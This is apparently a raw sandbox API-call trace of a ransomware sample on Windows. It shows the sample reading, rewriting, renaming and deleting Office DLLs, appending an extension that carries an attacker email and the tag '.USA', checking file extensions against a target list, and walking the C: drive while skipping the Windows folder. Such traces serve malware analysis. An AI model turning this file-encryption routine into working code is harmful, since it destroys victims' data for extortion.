[0058.791] CloseHandle (hObject=0x220) returned 1 [0058.791] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.791] SetEndOfFile (hFile=0x1f0) returned 1 [0058.792] CloseHandle (hObject=0x1f0) returned 1 [0058.792] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.792] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll")) returned 1 [0058.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0058.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0058.792] lstrlenW (lpString=".doc") returned 4 [0058.792] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.792] lstrlenW (lpString=".docx") returned 5 [0058.793] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0058.793] lstrlenW (lpString=".pdf") returned 4 [0058.793] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.793] lstrlenW (lpString=".xls") returned 4 [0058.793] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.793] lstrlenW (lpString=".xlsx") returned 5 [0058.793] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0058.793] lstrlenW (lpString=".ppt") returned 4 [0058.793] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0058.793] lstrlenW (lpString=".zip") returned 4 [0058.793] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.793] lstrlenW (lpString=".rar") returned 4 [0058.793] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.793] lstrlenW (lpString=".bz2") returned 4 [0058.793] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.793] lstrlenW (lpString=".7z") returned 3 [0058.793] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0058.793] lstrlenW (lpString=".dbf") returned 4 [0058.793] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0058.793] lstrlenW (lpString=".1cd") returned 4 [0058.793] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0058.793] lstrlenW (lpString=".jpg") returned 4 [0058.793] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0058.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0058.793] lstrlenW (lpString=".doc") returned 4 [0058.793] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.793] lstrlenW (lpString=".docx") returned 5 [0058.793] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0058.793] lstrlenW (lpString=".pdf") returned 4 [0058.793] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.793] lstrlenW (lpString=".xls") returned 4 [0058.793] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.794] lstrlenW (lpString=".xlsx") returned 5 [0058.794] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0058.794] lstrlenW (lpString=".ppt") returned 4 [0058.794] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0058.794] lstrlenW (lpString=".zip") returned 4 [0058.794] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.794] lstrlenW (lpString=".rar") returned 4 [0058.794] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.794] lstrlenW (lpString=".bz2") returned 4 [0058.794] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.794] lstrlenW (lpString=".7z") returned 3 [0058.794] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0058.794] lstrlenW (lpString=".dbf") returned 4 [0058.794] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0058.794] lstrlenW (lpString=".1cd") returned 4 [0058.794] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0058.794] lstrlenW (lpString=".jpg") returned 4 [0058.794] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.794] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0058.794] lstrlenW (lpString="xlsrvintl.dll") returned 13 [0058.794] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0058.795] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=105344) returned 1 [0058.795] CloseHandle (hObject=0x1f0) returned 1 [0058.795] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll")) returned 0x20 [0058.796] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0058.796] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.796] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0058.796] GetLastError () returned 0x0 [0058.796] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x19b80, lpOverlapped=0x0) returned 1 [0058.799] WriteFile (in: hFile=0x220, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0x19b90, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0x19b90, lpOverlapped=0x0) returned 1 [0058.802] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.802] WriteFile (in: hFile=0x220, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xee, lpOverlapped=0x0) returned 1 [0058.802] SetEndOfFile (hFile=0x220) returned 1 [0058.802] CloseHandle (hObject=0x220) returned 1 [0058.802] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.802] SetEndOfFile (hFile=0x1f0) returned 1 [0058.803] CloseHandle (hObject=0x1f0) returned 1 [0058.803] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.803] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll")) returned 1 [0058.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0058.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0058.804] lstrlenW (lpString=".doc") returned 4 [0058.804] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0058.804] lstrlenW (lpString=".docx") returned 5 [0058.804] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0058.804] lstrlenW (lpString=".pdf") returned 4 [0058.804] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0058.804] lstrlenW (lpString=".xls") returned 4 [0058.804] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0058.804] lstrlenW (lpString=".xlsx") returned 5 [0058.804] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0058.804] lstrlenW (lpString=".ppt") returned 4 [0058.804] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0058.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0058.804] lstrlenW (lpString=".zip") returned 4 [0058.804] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0058.804] lstrlenW (lpString=".rar") returned 4 [0058.804] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0058.804] lstrlenW (lpString=".bz2") returned 4 [0058.804] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0058.804] lstrlenW (lpString=".7z") returned 3 [0058.804] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0058.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0058.804] lstrlenW (lpString=".dbf") returned 4 [0058.804] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0058.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0058.804] lstrlenW (lpString=".1cd") returned 4 [0058.804] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0058.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0058.804] lstrlenW (lpString=".jpg") returned 4 [0058.804] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0058.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0058.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0058.805] lstrlenW (lpString=".doc") returned 4 [0058.805] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0058.805] lstrlenW (lpString=".docx") returned 5 [0058.805] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0058.805] lstrlenW (lpString=".pdf") returned 4 [0058.805] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0058.805] lstrlenW (lpString=".xls") returned 4 [0058.805] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0058.805] lstrlenW (lpString=".xlsx") returned 5 [0058.805] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0058.805] lstrlenW (lpString=".ppt") returned 4 [0058.805] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0058.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0058.805] lstrlenW (lpString=".zip") returned 4 [0058.805] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0058.805] lstrlenW (lpString=".rar") returned 4 [0058.805] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0058.805] lstrlenW (lpString=".bz2") returned 4 [0058.805] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0058.805] lstrlenW (lpString=".7z") returned 3 [0058.805] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0058.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0058.805] lstrlenW (lpString=".dbf") returned 4 [0058.805] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0058.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0058.805] lstrlenW (lpString=".1cd") returned 4 [0058.805] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0058.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0058.805] lstrlenW (lpString=".jpg") returned 4 [0058.805] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0058.806] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0058.806] lstrlenW (lpString="ACECORE.DLL") returned 11 [0058.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0058.807] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=3213192) returned 1 [0058.807] CloseHandle (hObject=0x1f0) returned 1 [0058.807] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll")) returned 0x20 [0058.807] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.807] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0058.808] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0058.808] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0058.808] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0058.808] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0058.811] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x1057d8, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0058.820] ReadFile (in: hFile=0x1f0, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0058.824] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0058.824] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x2d0788, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0058.824] ReadFile (in: hFile=0x1f0, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0059.878] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.878] WriteFile (in: hFile=0x1f0, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0059.890] SetEndOfFile (hFile=0x1f0) returned 1 [0059.890] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3f30068 [0059.890] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0059.890] WriteFile (in: hFile=0x1f0, lpBuffer=0x3f30068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f30068*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0059.891] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x1057d8, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0059.891] WriteFile (in: hFile=0x1f0, lpBuffer=0x3f30068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f30068*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0059.895] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x2d0788, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0059.895] WriteFile (in: hFile=0x1f0, lpBuffer=0x3f30068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f30068*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0059.900] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f30068 | out: hHeap=0x5d0000) returned 1 [0059.900] CloseHandle (hObject=0x1f0) returned 1 [0059.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0059.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0059.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0059.901] lstrlenW (lpString=".doc") returned 4 [0059.901] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.901] lstrlenW (lpString=".docx") returned 5 [0059.901] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1 [0059.901] lstrlenW (lpString=".pdf") returned 4 [0059.901] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.901] lstrlenW (lpString=".xls") returned 4 [0059.901] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.901] lstrlenW (lpString=".xlsx") returned 5 [0059.901] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1 [0059.901] lstrlenW (lpString=".ppt") returned 4 [0059.901] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0059.901] lstrlenW (lpString=".zip") returned 4 [0059.901] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.901] lstrlenW (lpString=".rar") returned 4 [0059.901] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.901] lstrlenW (lpString=".bz2") returned 4 [0059.901] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.901] lstrlenW (lpString=".7z") returned 3 [0059.902] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0059.902] lstrlenW (lpString=".dbf") returned 4 [0059.902] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0059.902] lstrlenW (lpString=".1cd") returned 4 [0059.902] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0059.902] lstrlenW (lpString=".jpg") returned 4 [0059.902] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0059.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0059.902] lstrlenW (lpString=".doc") returned 4 [0059.902] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.902] lstrlenW (lpString=".docx") returned 5 [0059.902] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1 [0059.902] lstrlenW (lpString=".pdf") returned 4 [0059.902] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.902] lstrlenW (lpString=".xls") returned 4 [0059.902] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.902] lstrlenW (lpString=".xlsx") returned 5 [0059.902] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1 [0059.902] lstrlenW (lpString=".ppt") returned 4 [0059.902] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0059.902] lstrlenW (lpString=".zip") returned 4 [0059.902] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.902] lstrlenW (lpString=".rar") returned 4 [0059.902] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.902] lstrlenW (lpString=".bz2") returned 4 [0059.902] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.902] lstrlenW (lpString=".7z") returned 3 [0059.903] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0059.903] lstrlenW (lpString=".dbf") returned 4 [0059.903] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0059.903] lstrlenW (lpString=".1cd") returned 4 [0059.903] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67 [0059.903] lstrlenW (lpString=".jpg") returned 4 [0059.903] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.903] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0060.100] lstrlenW (lpString="ACEEXCL.DLL") returned 11 [0060.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 19 os_tid = 0x9c8 [0034.624] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3ef0048 [0034.625] lstrlenW (lpString="C:") returned 2 [0034.625] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x3aafd00 | out: lpFindFileData=0x3aafd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x62b3f8 [0034.625] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0034.625] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0034.625] lstrlenW (lpString="$Recycle.Bin") returned 12 [0034.625] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0034.625] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3f00050 [0034.626] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0034.626] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x3aafa84 | out: lpFindFileData=0x3aafa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, 